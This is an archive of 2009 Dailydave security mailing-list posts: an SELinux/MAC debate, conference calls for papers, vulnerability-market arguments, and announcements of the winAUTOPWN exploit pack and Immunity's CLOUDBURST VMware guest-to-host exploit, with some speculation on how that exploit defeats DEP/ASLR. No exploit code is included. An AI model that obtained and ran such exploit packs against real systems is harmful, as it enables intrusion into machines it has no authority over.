From dave at immunityinc.com  Wed Apr  1 15:37:08 2009
From: dave at immunityinc.com (dave)
Date: Wed, 01 Apr 2009 15:37:08 -0400
Subject: [Dailydave] http://xorl.wordpress.com/ is great.
Message-ID: <49D3C264.3020707@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"Journalism" is something that weirds me out; "Journals" come out
periodically - which is another word for "too late to matter". If you're
like me, you have a whole pile of things in Google Reader to go through
every day.

So today, in my goal to get everyone on the same page is the
consistently quality weblog http://xorl.wordpress.com/ . You could spend
your time reading weblogs put out by commercial companies in thinly
disguised efforts to get you to buy something, or you can read xorl and
learn something.

Ideally now that he knows I read him, he won't XSS me and get my Google
cookie.

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknTwmQACgkQtehAhL0ghepcUwCbBd+aFk0oqzE6Cf7q3LV73gVn
HV8An0PyMdi/+S+pm5635f8/BFsBqYWh
=bd9Q
-----END PGP SIGNATURE-----

From joanna at invisiblethingslab.com  Wed Apr  1 16:48:47 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Wed, 01 Apr 2009 22:48:47 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
 was Re: No more Novell AppArmor?
In-Reply-To: <20090401010350.GA31661@grsecurity.net>
References: <b581b3220710131630v584c51a2w3c248f1cd4d1337f@mail.gmail.com>	<002e01c80ee2$90d958a0$6207a8c0@jseitz>	<20090326212859.GC16789@subspacefield.org>
	<20090401010350.GA31661@grsecurity.net>
Message-ID: <49D3D32F.7060602@invisiblethingslab.com>

Brad Spengler wrote:

> It is cool to be dismissive and aloof about "new" (9 year old) 
> technologies.  Otherwise you're just the SELinux version of the "year of 
> Linux on the desktop!" guy.  Regarding ineffectiveness (and specifically in
> regards to "proofs" and words such as "can't" and complexity/usability 
> trade-offs) I won't repeat myself, since everything that needed to be 
> said or demonstrated was done 2 years ago:
> http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
> 
<cut>

Let me also point out to Rafal's SELinux exploit from 2003(!):

http://www.nsa.gov/research/selinux/list-archive/0306/4468.shtml

...as well as his recent exercise in SELinux default policy bypassing on
Xenified FC8:

http://invisiblethingslab.com/resources/misc08/xenfb-adventures-10.pdf

These were not kernel exploits, but rather something taking advantage of an
overcomplexity of the system.

Of course, the main argument against all those SELinux-like-academic-systems are
kernel exploits, as pageexec and Brand correctly pointed out. I see that people
can only argue about *how* to address that very problem (of kernel exploits),
not about whether it *is* a problem.

So, whether to use "Security by Obscurity" approach (e.g. ASLR) or "Security by
Isolation" approach, that requires isolation of drivers (think VT-d). I guess we
all know that "Security by Correctenss" has not, and will not work for kernel
and drivers code.

joanna.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 226 bytes
Desc: OpenPGP digital signature
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090401/99847ccc/attachment.pgp 

From dr at kyx.net  Wed Apr  1 17:29:32 2009
From: dr at kyx.net (Dragos Ruiu)
Date: Wed, 1 Apr 2009 13:29:32 -0800
Subject: [Dailydave] EUSecWest 2009 CFP (May 27/28, Deadline April 7 2009)
Message-ID: <200904011429.32505.dr@kyx.net>

Call For Papers

    The EUSecWest 2009 CFP is now open.

    Deadline is April 7th, 2009.

EUSecWest CALL FOR PAPERS

    LONDON, U.K. -- The third annual EUSecWest applied
    technical security conference - where the eminent figures
    in the international security industry will get together
    share best practices and technology - will be held in
    downtown London at the Sound Club in Leicester Square
    on May 27/28, 2009. The most significant new discoveries
    about computer network hack attacks and defenses,
    commercial security solutions, and pragmatic real world
    security experience will be presented in a series of
    informative tutorials.

    The EUSecWest meeting provides international researchers
    a relaxed, comfortable environment to learn from
    informative tutorials on key developments in security
    technology, and collaborate and socialize with their peers
    in one of the world's most most important technology
    hubs and scenic cities. The timing of the conference
    allows international travelers to travel to Berlin for
    FX's Ph-Neutral on the weekend, and Rennes the 
    following week for SSTIC.

    We would like to announce the opportunity to submit
    papers, and/or lightning talk proposals for selection by
    the EUSecWest technical review committee. This year we
    will be doing one hour talks, and some shorter talk
    sessions.

    Please make your paper proposal submissions before
    April 7th, 2009.

    Some invited papers have been confirmed, but a limited
    number of speaking slots are still available. The
    conference is responsible for travel and accommodations for
    the speaker (one speaker airfare and one room). If you 
    have a proposal for a tutorial session then please email 
    a synopsis of the material and your biography, papers 
    and, speaking background to secwest09 [at] eusecwest.com . 
    Only slides will be needed for the paper deadline, full text 
    does not have to be submitted - but will be accepted if 
    available. 

    The EUSecWest 2009 conference consists of tutorials on
    technical details about current issues, innovative
    techniques and best practices in the information security
    realm. The audiences are a multi-national mix of
    professionals involved on a daily basis with security
    work: security product vendors, programmers, security
    officers, and network administrators. We give preference
    to technical details and new education for a technical
    audience.

    The conference itself is a single track series of
    presentations in a lecture theater environment. The
    presentations offer speakers the opportunity to showcase
    on-going research and collaborate with peers while
    educating and highlighting advancements in security
    products and techniques. The focus is on innovation,
    tutorials, and education instead of product pitches. Some
    commercial content is tolerated, but it needs to be backed
    up by a technical presenter - either giving a valuable
    tutorial and best practices instruction or detailing
    significant new technology in the products.

    Paper proposals should consist of the following
    information:
     1. Presenter, and geographical location (country of
        origin/passport) and contact info (e-mail, postal
        address, phone, fax).
     2. Employer and/or affiliations.
     3. Brief biography, list of publications and papers.
     4. Any significant presentation and educational
        experience/background.
     5. Topic synopsis, Proposed paper title, and a one
        paragraph description.
     6. Reason why this material is innovative or significant
        or an important tutorial.
     7. Optionally, any samples of prepared material or
        outlines ready.
     8. Will you have full text available or only slides?
     9. Language of preference for submission.
    10. Please list any other publications or conferences
        where this material has been or will be
        published/submitted.

    Please include the plain text version of this information
    in your email as well as any file, pdf, sxw, ppt, or html
    attachments.

    Please forward the above information to secwest09 [at]
    eusecwest.com to be considered for placement on the
    speaker roster, or have your lightning talk scheduled. If
    you contact anyone else at our organization please ensure
    you also cc the submission address with your proposal or
    it may be omitted from the review process.


cheers,
--dr

-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
London, U.K. May 27/28 2009 ?http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp

From quakerdoomer at inbox.lv  Thu Apr  2 02:26:29 2009
From: quakerdoomer at inbox.lv (QUAKER DOOMER)
Date: Thu, 02 Apr 2009 09:26:29 +0300
Subject: [Dailydave] winAUTOPWN 1.7 - Now you can sleep
Message-ID: <1238653589.49d45a9509867@mail.inbox.lv>

Dear all,

As promised I am releasing winAUTOPWN version 1.7 on 1st April completely 
updated having all remote exploits of 2009 Q1 and a few before that.
The Latest available release now is winAUTOPWN version 1.7



Coded by : Azim Poonawala (QUAKERDOOMER)

winAUTOPWN available at  http://winautopwn.co.nr

Author's website : http://solidmecca.co.nr

winAUTOPWN is updated almost daily.
Latest Release can always be downloaded from : http://winautopwn.exofire.net/
winAUTOPWN.RAR


"winAUTOPWN - WINDOWS AUTOPWN (For The True HyperSomniac H-a-c-k-e-r-z-
z-z-z-Z-Z)"


Regards,
QUAKERDOOMER


From crioux at noctem.org  Wed Apr  1 23:04:03 2009
From: crioux at noctem.org (Christien Rioux)
Date: Wed, 1 Apr 2009 23:04:03 -0400
Subject: [Dailydave] SOURCE Barcelona 2009 CFP now open
Message-ID: <5680af290904012004l62aa3642n848958ca20c402c8@mail.gmail.com>

All,

The SOURCE Barcelona CFP is now open.

SOURCE Conference is a technical and professional conference that
combines advanced technology and application security practices with
the business of security. SOURCE events are attended by senior
technical executives, information security thought leaders and
experts, and members of the business and security community who are
looking to gain technical insight, and develop their business acumen.
Please note that marketing led or presentations directly promoting a
company's products will not be accepted. Potential speakers must
submit their own speaking abstracts and submissions from PR agencies
will not be accepted.

Information about SOURCE Barcelona Tracks (60 Min, English Language)

Track 1: Security and Technology - Talks pertaining to new security
technologies, security software, application security, secure coding
practices, engineering issues surrounding security. New software
releases and technology demonstrations are preferred.

Track 2: Business and Security - Talks pertaining to the business of
security and critical decision-making. Entrepreneurship, issues of
compliance, regulation, privacy laws, disclosure, economics.

Lightning Talks - 5-7 minute presentations on a security related subject.

Session proposals are due by May 29, 2009.

Abstracts for sessions must be submitted online at the SOURCE
Conference Web site. Sessions must be submitted by the speakers
themselves and marketing-focused proposals will not be accepted. More
information on the SOURCE Barcelona 2009 call for papers -- as well as
attendee registration and sponsorship information -- can be found at
http://www.sourceconference.com.

Speakers will be notified by June 20, 2009.

Keynote Speakers include:
Adam Laurie
Ivan Krsti?

Venue:

SOURCE Barcelona will take place in Barcelona's famous Museu Nacional
D'art de Catalunya (http://www.mnac.cat). Set high on Monjuic, the
MNAC overlooks all of the city of Barcelona. SOURCE is fortunate to
have the opportunity to make use of the museum's lecture halls for our
sessions.  SOURCE also takes place a few days before Barcelona's famed
festival, La Merce (http://www.bcn.cat/merce/en/index.shtml), so stay
a few days and enjoy fireworks, human pyramids, and the festival of
beasts!

Conference registration information is available and www.sourceconference.com

Questions regarding this conference may be sent to info at
sourceconference dot com

Conference Manager:

Stacy Thayer, Ph.D.

From vulcan.ddtek at gmail.com  Thu Apr  2 13:06:53 2009
From: vulcan.ddtek at gmail.com (vulc@n ddtek)
Date: Thu, 2 Apr 2009 13:06:53 -0400
Subject: [Dailydave] Defcon 17 CTF Qualifier announced dispite conficker
Message-ID: <16cb40400904021006l1c520d6al2d0ef435da94f7c2@mail.gmail.com>

try again.  previous try didn't make it through...
see also:  https://forum.defcon.org/showthread.php?t=10317

 ~~ Vulc at N


FOR IMMEDIATE RELEASE

1 APRIL 2009

DEFCON CTF QUALIFIER ANNOUNCED

Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round
of
qualification for DEFON 17 CTF.

The competition will be held on 5-7 June - without a stop, participants can
be
located everywhere. All are to play, but only the 9 best groups will
be invited to join us in Las Vegas for the annual DEFCON ninja square off.
We
also intend to honour the code of the former CTF host and automatically
qualify
last years champion, the sk3wl of r00t (although we sincerely hope them to
participate in qualifications).

The qualification round will be in the style of game board, but answers need
not
be in the form of a question. Categories will require teams to demonstrate
the
superiority of hacking into a vast relm of security.

You must be registered for participate.

Registration site: http://ddtek.biz/ctf/register.html
Registration opens: 01.04.2009 00:00:00 UTC
Registration ends: 04.06.2009 00:00:00 UTC

Qualifications open: 05.06.2009 23:00:00 UTC
Qualifications ends: 07.06.2009 23:00:00 UTC


More information that will follow via your registered email address.

Bring all your l33t haxor skillz just leave your Kiddie toolz behind.

Vulc at n
Difensiva Senior Engineer
Diuntinus Defense Technologies, Inc.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090402/b590105a/attachment.htm 

From pageexec at freemail.hu  Thu Apr  2 14:01:36 2009
From: pageexec at freemail.hu (pageexec at freemail.hu)
Date: Thu, 02 Apr 2009 20:01:36 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
Message-ID: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>

On 30 Mar 2009 at 16:55, Travis wrote:

> On Sat, Mar 28, 2009 at 08:48:36AM +0200, pageexec at freemail.hu wrote:
> > do 'exploitable kernel bugs' count?
> 
> Searching the NVD/CVE shows 5 vulns.

you might want to re-read that 'kernel bugs' part. SELinux != kernel
by any stretch of the word.

> Are there more?  Possibly, I don't know.

possibly, the same search engine holds the answer. at least for those
bugs that the kernel devs decided to document.

> Sure, it's bad to introduce a vulnerability.  Introducing a kernel
> vulnerability is especially bad.  They definitely count.  Hopefully,
> as the code matures, we'll see fewer of them.  Yes, it's embarrassing
> for a security enhancement to actually introduce vulnerabilities.

it's irrelevant how many bugs SELinux introduces because the rest of
the kernel has orders of magnitude more itself.

> Let's address the (implied) argument here; this is kernel code, in C,
> designed to limit the scope of damage if someone siezes control of a
> program's execution context.  The argument is that if there are any
> vulnerabilities introduced by the implementation, it is inherently
> flawed and must be rejected.

the argument is not about SELinux bugs but exploitable kernel bugs.
any one of them completely undermines SELinux (obviously not counting
those that are not reachable due to kernel or policy configuration).

seizing control of a programs's execution context means that the attacker
can directly exploit the kernel bugs from there. in other words, for the
situation you mention, SELinux is inherently flawed (which as Peter Busser
mentioned elsewhere is no surprise, MAC was designed for a different
environment).

but you can prove your statement if you want: create an exploitable service
on your personal box that holds your most valuable data and open up access
to the internet (if you're lazy, just open up ssh and give the world a shell
prompt) and keep running it for the rest of your life. make sure you apply
the same SELinux policy to it that you use on your otherwise sensitive apps
(such as web browser, mail/chat clients, etc).

if you actually believe your own words, then you're not going to find fake
excuses for not doing this experiment. after all, SELinux protects you even
'if someone siezes control of a program's execution context', right?

> Does an exploitable implementation bug invalidate the entire
> idea/design/system?  I'm not convinced that's true.  If it were, the
> same argument would apply against, say, OpenSSH.

what is flawed is your use of SELinux. as for openssh, one day you might
learn about the aftermath of CVE-2001-0144 then you'll be in a better position
to argue about the consequences of implementation bugs.
 
> Even on an implementation level, I think the real question for a
> security subsystem is whether the net result is going to be an
> improvement in security or not.  I think this is the core of the
> disagreements here.  It's easy to count the vulnerabilities found in
> the implementation (it's also relatively easy to fix the code, once
> they are disclosed).  But it's harder to quantify the benefit of
> _containing_ an intruder who manages to pop a vulnerable service.
> 
> IMHO, this is what I think is really meant by "defense-in-depth"; not
> band-aids deployed in middleboxes with crossed fingers to hopefully
> protect crappy code, but a real layer of access control that can
> really limit an adversary after an intrusion.  I'm still not convinced
> the idea is a bad one, even if the implementation isn't perfect.

the ball is on your side now to prove it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: WPM$219F.PM$
Type: application/octet-stream
Size: 3377 bytes
Desc: Mail message body
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090402/f2932baa/attachment.obj 

From dave at immunityinc.com  Thu Apr  2 15:51:42 2009
From: dave at immunityinc.com (dave)
Date: Thu, 02 Apr 2009 15:51:42 -0400
Subject: [Dailydave] OWASP Miami! You should come!
Message-ID: <49D5174E.4050508@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

So I'm giving a talk at OWASP Miami's meeting tomorrow night. It's an
updated version of the OWASP NYC talk I gave ("Corruption"). I'll add a
discussion of Sharepoint security as well, because I think it's really
interesting. Also, there will be beer, so even if you do not think it's
interesting at the beginning, probably by the end you will think so.

https://www.owasp.org/index.php/Miami_Ft_Lauderdale

Date/Time -
Fri. April 3rd 6PM (AKA TOMORROW NIGHT)

Meeting Location -
Immunity, Inc.
1247 Alton Road
Miami Beach, FL 33139
Phone: (305) 534-9511

thanks,
Dave Aitel
Immunity, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknVF04ACgkQtehAhL0ghepA2ACfbqwGjqhXiLQ/d39nksTTZx7L
PAYAn0pWCqg/by9YjnnEiDpPOeU4VIFB
=yVdD
-----END PGP SIGNATURE-----

From dave.aitel at gmail.com  Sat Apr  4 16:22:39 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Sat, 4 Apr 2009 16:22:39 -0400
Subject: [Dailydave] Immunity's CLOUDBURST
Message-ID: <b581b3220904041322s2e6c5a37gc1654063a6ab2e77@mail.gmail.com>

If you have a CEU subscription, access it here:
http://www.immunityinc.com/ceu-index.shtml

For a quick movie:
http://www.immunityinc.com/documentation/cloudburst-vista.html

Kostya Kortchinsky's CLOUDBURST exploit is now available to CANVAS
Early Update subscribers. It is patched in the latest versions of
VMWare workstation and VMWare Player, etc.

Thanks,
Dave Aitel
Immunity, Inc.

From dave.aitel at gmail.com  Mon Apr  6 21:01:11 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Mon, 6 Apr 2009 21:01:11 -0400
Subject: [Dailydave] Immunity's CLOUDBURST
In-Reply-To: <b581b3220904041322s2e6c5a37gc1654063a6ab2e77@mail.gmail.com>
References: <b581b3220904041322s2e6c5a37gc1654063a6ab2e77@mail.gmail.com>
Message-ID: <b581b3220904061801q7b2ae3d1sb16ee6baff11b7da@mail.gmail.com>

A few people have mentioned that this was a bit terse. It's "Final's"
night for a lot of people who watch collage basketball I hear, so I'll
leave you with just a quick bullet list and expand on it tomorrow:

1. What you're seeing in the movie is shellcode executing on a Host
from a driver that runs in a Guest.
2. If you're running the latest update of Workstation, you're patched.
3. ESX/ESXi is not vulnerable, to my knowledge.
4. The exploit is amazing, and at some point Kostya will do a talk on it.
5. As you can see in the movie, the exploit defeats DEP/ASLR on Vista
SP1 to go from guest to host. The exploit also works on Linux, but
ScreenFlash doesn't.

More on exploits and such tomorrow.

-dave

On Sat, Apr 4, 2009 at 4:22 PM, Dave Aitel <dave.aitel at gmail.com> wrote:
> If you have a CEU subscription, access it here:
> http://www.immunityinc.com/ceu-index.shtml
>
> For a quick movie:
> http://www.immunityinc.com/documentation/cloudburst-vista.html
>
> Kostya Kortchinsky's CLOUDBURST exploit is now available to CANVAS
> Early Update subscribers. It is patched in the latest versions of
> VMWare workstation and VMWare Player, etc.
>
> Thanks,
> Dave Aitel
> Immunity, Inc.
>

From jt at cr0.org  Tue Apr  7 06:07:19 2009
From: jt at cr0.org (Julien TINNES)
Date: Tue, 7 Apr 2009 12:07:19 +0200
Subject: [Dailydave] Immunity's CLOUDBURST
In-Reply-To: <b581b3220904061801q7b2ae3d1sb16ee6baff11b7da@mail.gmail.com>
References: <b581b3220904041322s2e6c5a37gc1654063a6ab2e77@mail.gmail.com>
	<b581b3220904061801q7b2ae3d1sb16ee6baff11b7da@mail.gmail.com>
Message-ID: <200904071207.19962.jt@cr0.org>

On Tuesday 07 April 2009, Dave Aitel wrote:
> A few people have mentioned that this was a bit terse. It's "Final's"
> night for a lot of people who watch collage basketball I hear, so I'll
> leave you with just a quick bullet list and expand on it tomorrow:
>
> 1. What you're seeing in the movie is shellcode executing on a Host
> from a driver that runs in a Guest.
> 2. If you're running the latest update of Workstation, you're patched.
> 3. ESX/ESXi is not vulnerable, to my knowledge.
> 4. The exploit is amazing, and at some point Kostya will do a talk on it.
> 5. As you can see in the movie, the exploit defeats DEP/ASLR on Vista
> SP1 to go from guest to host. The exploit also works on Linux, but
> ScreenFlash doesn't.

That seems very cool, I can't wait for details!

However I wonder why DEP and ASLR are a problem.

- If a page is marked as executable in Guest, it'll be marked as executable in 
the shadow page tables (with some exceptions).
- For ASLR, well, most page table entries in guest will be mirrored in shadow 
page tables on host, so in this process, you know the addresses.

Hence I would say, as long as you can run unmonitored code with VMM privileges 
in the guest, you don't have any problem with DEP/ASLR and you can subvert 
the VMM easily by using the gs segment selector (whose corresponding segment 
is not limited, since this is how binary translated code access the VMM 
memory).

Which would suggest you are exploiting something in another process than the 
Guest-VMM one ? Did you put your shellcode in the framebuffer (which would 
indeed end-up in VMWare's main process). Is it another instance of bitblt 
overflows in virtualization software (Tavis Ormandy found a couple of them a 
few years ago)?

All of this is very exciting.

Julien

From yersinia.spiros at gmail.com  Tue Apr  7 06:47:25 2009
From: yersinia.spiros at gmail.com (yersinia)
Date: Tue, 7 Apr 2009 12:47:25 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
In-Reply-To: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>
References: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>
Message-ID: <b086760e0904070347s5be13ed3k6dc8dcfecddbdf34@mail.gmail.com>

2009/4/2 <pageexec at freemail.hu>

> On 30 Mar 2009 at 16:55, Travis wrote:
>
> > On Sat, Mar 28, 2009 at 08:48:36AM +0200, pageexec at freemail.hu wrote:
> > > do 'exploitable kernel bugs' count?
> >
> > Searching the NVD/CVE shows 5 vulns.
>
> you might want to re-read that 'kernel bugs' part. SELinux != kernel
> by any stretch of the word.
>
> > Are there more?  Possibly, I don't know.
>
> possibly, the same search engine holds the answer. at least for those
> bugs that the kernel devs decided to document.
>
> > Sure, it's bad to introduce a vulnerability.  Introducing a kernel
> > vulnerability is especially bad.  They definitely count.  Hopefully,
> > as the code matures, we'll see fewer of them.  Yes, it's embarrassing
> > for a security enhancement to actually introduce vulnerabilities.
>
> it's irrelevant how many bugs SELinux introduces because the rest of
> the kernel has orders of magnitude more itself.
>
> > Let's address the (implied) argument here; this is kernel code, in C,
> > designed to limit the scope of damage if someone siezes control of a
> > program's execution context.  The argument is that if there are any
> > vulnerabilities introduced by the implementation, it is inherently
> > flawed and must be rejected.
>
> the argument is not about SELinux bugs but exploitable kernel bugs.
> any one of them completely undermines SELinux (obviously not counting
> those that are not reachable due to kernel or policy configuration).
>
> seizing control of a programs's execution context means that the attacker
> can directly exploit the kernel bugs from there. in other words, for the
> situation you mention, SELinux is inherently flawed (which as Peter Busser
> mentioned elsewhere is no surprise, MAC was designed for a different
> environment).
>
> but you can prove your statement if you want: create an exploitable service
> on your personal box that holds your most valuable data and open up access
> to the internet (if you're lazy, just open up ssh and give the world a
> shell
> prompt) and keep running it for the rest of your life. make sure you apply
> the same SELinux policy to it that you use on your otherwise sensitive apps
> (such as web browser, mail/chat clients, etc).




>
> if you actually believe your own words, then you're not going to find fake
> excuses for not doing this experiment. after all, SELinux protects you even
> 'if someone siezes control of a program's execution context', right?
>
> > Does an exploitable implementation bug invalidate the entire
> > idea/design/system?  I'm not convinced that's true.  If it were, the
> > same argument would apply against, say, OpenSSH.
>
> what is flawed is your use of SELinux. as for openssh, one day you might
> learn about the aftermath of CVE-2001-0144 then you'll be in a better
> position
> to argue about the consequences of implementation bugs.
>
> > Even on an implementation level, I think the real question for a
> > security subsystem is whether the net result is going to be an
> > improvement in security or not.  I think this is the core of the
> > disagreements here.  It's easy to count the vulnerabilities found in
> > the implementation (it's also relatively easy to fix the code, once
> > they are disclosed).  But it's harder to quantify the benefit of
> > _containing_ an intruder who manages to pop a vulnerable service.
> >
> > IMHO, this is what I think is really meant by "defense-in-depth"; not
> > band-aids deployed in middleboxes with crossed fingers to hopefully
> > protect crappy code, but a real layer of access control that can
> > really limit an adversary after an intrusion.  I'm still not convinced
> > the idea is a bad one, even if the implementation isn't perfect.
>
> the ball is on your side now to prove it.
>
>
SIA
There is someone that have already done it, other that write about
this topic (
http://etbe.coker.com.au/2007/10/10/how-se-linux-prevents-local-root-exploits/
)

Try the selinux play machine - it's only access is root with uid 0.
http://www.coker.com.au/selinux/play.html







>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090407/e7dd836a/attachment.htm 

From sqlsec at yahoo.com  Tue Apr  7 14:21:47 2009
From: sqlsec at yahoo.com (Cesar)
Date: Tue, 7 Apr 2009 11:21:47 -0700 (PDT)
Subject: [Dailydave] Opening Intranets to attack by using Internet Explorer
	(paper)
Message-ID: <419398.13763.qm@web33005.mail.mud.yahoo.com>


Hi

Just released a new paper I guess it will be very interesting for list members.

http://nomoreroot.blogspot.com/2009/04/opening-intranets-to-attacks-by-using.html

I will be glad to hear your feedback.

Enjoy.

Cesar.


      

From dave at immunityinc.com  Tue Apr  7 17:07:46 2009
From: dave at immunityinc.com (dave)
Date: Tue, 07 Apr 2009 17:07:46 -0400
Subject: [Dailydave] Peas, Mash and CANVAS.
Message-ID: <49DBC0A2.1010308@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The CANVAS team (mostly Rich, in this case) did a rework of the GUI and
it's BEAUTIFUL now. Or at least requires a lot less training than it
used to, shall we say. Now we get to focus on really taking advantage of
the new feature set - like the built in Python commandline!

http://www.immunityinc.com/documentation/cmdlinetab.html

People see "built in XML-RPC based commandline" as "more things to
learn?!?" but I see it as "Integrate with all your current tools or new
tools you realize you need" and "build quick scripts to automate away
all your pain" and "have a friend help you hack". :>

And, in other news:

LONDON!

Immunity Inc. is proud to announce that it will be holding its first
ever public CANVAS Training class in London, England.  This two day
class teaches students how to best use CANVAS for
vulnerability exploitation and penetration testing. The hands-on
exercises get students familiar with effective use of the GUI and
command line interfaces, as well as advanced attack planning. We walk
through the process of target discovery and reconnaissance and CANVAS
node concepts. Exploit selection, client-side exploitation, and
post-exploitation actions including process spawning, privilege
escalation, bouncing and using MOSDEF trojans are covered in detail.
Challenges such as handling network address translation (NAT), setting
callbacks, attacking multiple hosts and CANVAS customization are also
answered.

Location: 70 St Mary Axe, London EC3A 8BE
Dates: May 11-12, 2009
Times: 9am-5pm
Trainer: UK's own Rich Smith
Cost: $2000USD (roughly 5p) per student.  Cost includes training
manuals, CANVAS license*, and a certificate upon successful completion
of the course.


Seats are limited so please sign up early.  The deadline to enroll is
Thursday April 23, 2009 by 5pm EST.

If you are interested in enrolling or would like additional
information please email us at admin at immunityinc.com


Thanks,
Dave Aitel
Immunity, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknbwKIACgkQtehAhL0gheoXtACeL9lyzYoR0YRDYJAWqll1JF5T
C+IAn0qSRWjzMn0mh2gpYaeJSwNLgGzV
=cIPJ
-----END PGP SIGNATURE-----

From pageexec at freemail.hu  Tue Apr  7 18:37:02 2009
From: pageexec at freemail.hu (pageexec at freemail.hu)
Date: Wed, 08 Apr 2009 00:37:02 +0200
Subject: [Dailydave] In defense of Mandatory Access Control,
In-Reply-To: <b086760e0904070347s5be13ed3k6dc8dcfecddbdf34@mail.gmail.com>
References: <49D4FD80.13819.3769D02D@pageexec.freemail.hu>,
	<b086760e0904070347s5be13ed3k6dc8dcfecddbdf34@mail.gmail.com>
Message-ID: <49DBD58E.32295.5225C98C@pageexec.freemail.hu>

On 7 Apr 2009 at 12:47, yersinia wrote:

> There is someone that have already done it, other that write about
> this topic (
> http://etbe.coker.com.au/2007/10/10/how-se-linux-prevents-local-root-exploits/
> )

which part of

  (obviously not counting those that are not reachable due to kernel
  or policy configuration)."

did you not understand? or are you perhaps suggesting that those kernels
cannot be exploited because one can write a policy that maybe prevent two
bugs from being reachable and there are no other kernel bugs left in there?
will you please expose your own box to the net using this magic kernel? ;)

> Try the selinux play machine - it's only access is root with uid 0.
> http://www.coker.com.au/selinux/play.html

so what valuable data will one find on this machine? nothing? is that all that
SELinux is able to protect?


From cmiller at securityevaluators.com  Wed Apr  8 12:17:29 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 11:17:29 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>

Hi everybody.

You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/ 
)  Basically, it is the chance for researchers to unite to get paid  
for the hard work we do.  As long as folks continue to give bugs to  
companies for free, the companies will never appreciate (or reward)  
the effort.  So I encourage you all to stop the insanity and stop  
giving away your hard work.  If you believe in the No More Free Bugs  
campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)  
on all of your presentations at security conferences.  I think it  
would be really great if vendors sat through an entire conference and  
every talk had this logo on it.  I'll definitely have it on my  
BlackHat Europe slide deck next week.

Also, I'd like to announce the CFP for the 3rd USENIX Workshop on  
Offensive Technologies (WOOT '09).  Check it out at http://www.usenix.org/event/woot09/cfp/ 
.  This is the only conference around that brings industry and  
academic security folks together.  Its a chance for industry  
researchers to show off their work to the academic community and vice  
versa - I'm being very kind here to academia ;)  Planning on  
submitting something cool to BH USA?  Submit it here too and present  
it again a week later.  It would be great if WOOT became a showcase of  
the best research of the previous year.

By the way, I've decided instead of getting a blog or twitter account,  
I'll just send emails on daily dave!

Take care,

Charlie


From sinan.eren at immunitysec.com  Wed Apr  8 14:27:21 2009
From: sinan.eren at immunitysec.com (sinan.eren at immunitysec.com)
Date: Wed, 8 Apr 2009 13:27:21 -0500 (EST)
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
References: <D9A50FA9-596E-466A-A581-11786627622C@securityevaluators.com>
Message-ID: <Pine.LNX.4.64.0904081311560.8016@mail.immunityinc.com>


A campaign is not enough. As long as there is not an open and free market 
for vulnerabilities/exploits, fair value can never be established. 
ZDI/idefense being both the market maker and the sole buyer is absurd and 
creates broken system that nobody, serious enough, respects. Fair pricing 
could only be established with open markets, this is as old as day and night ....

Also it is interesting to see on the blog commentary 
(http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/)
certain MS drones acknowledging the usefulness of ZDI/idefense but on the 
other hand they show extreme efforts to take down a vulnerability auction 
that was on ebay and not just once, several times in a row (excel 
anyone?)...

I tought this country favored and protected the right to establish fair 
value for one's creation.

-sinan




On Wed, 8 Apr 2009, Charles Miller wrote:

> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/
> )  Basically, it is the chance for researchers to unite to get paid
> for the hard work we do.  As long as folks continue to give bugs to
> companies for free, the companies will never appreciate (or reward)
> the effort.  So I encourage you all to stop the insanity and stop
> giving away your hard work.  If you believe in the No More Free Bugs
> campaign, please include our logo (http://nomorefreebugs.org/logo.jpg)
> on all of your presentations at security conferences.  I think it
> would be really great if vendors sat through an entire conference and
> every talk had this logo on it.  I'll definitely have it on my
> BlackHat Europe slide deck next week.
>
> Also, I'd like to announce the CFP for the 3rd USENIX Workshop on
> Offensive Technologies (WOOT '09).  Check it out at http://www.usenix.org/event/woot09/cfp/
> .  This is the only conference around that brings industry and
> academic security folks together.  Its a chance for industry
> researchers to show off their work to the academic community and vice
> versa - I'm being very kind here to academia ;)  Planning on
> submitting something cool to BH USA?  Submit it here too and present
